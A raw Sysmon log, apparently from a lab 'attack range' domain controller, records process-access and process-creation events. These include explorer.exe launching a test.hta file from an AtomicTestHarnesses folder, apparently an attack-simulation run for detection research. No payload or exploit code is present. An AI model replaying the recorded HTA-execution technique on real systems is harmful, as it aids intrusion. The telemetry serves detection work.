15:59:16.991{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.976{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.976{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.976{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.976{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.976{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.976{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.976{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000023233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.976{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000023232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.960{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5354-6008-3306-00000000A301}7712C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.960{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5354-6008-3306-00000000A301}7712C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.960{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5354-6008-3306-00000000A301}7712C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.945{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5354-6008-3306-00000000A301}7712C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.945{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.945{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.945{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.945{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.945{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5354-6008-3306-00000000A301}7712C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.945{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3306-00000000A301}7712C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000023222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.947{7901BC46-5354-6008-3306-00000000A301}7712C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEexplorer.exe "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000023221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3206-00000000A301}1108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 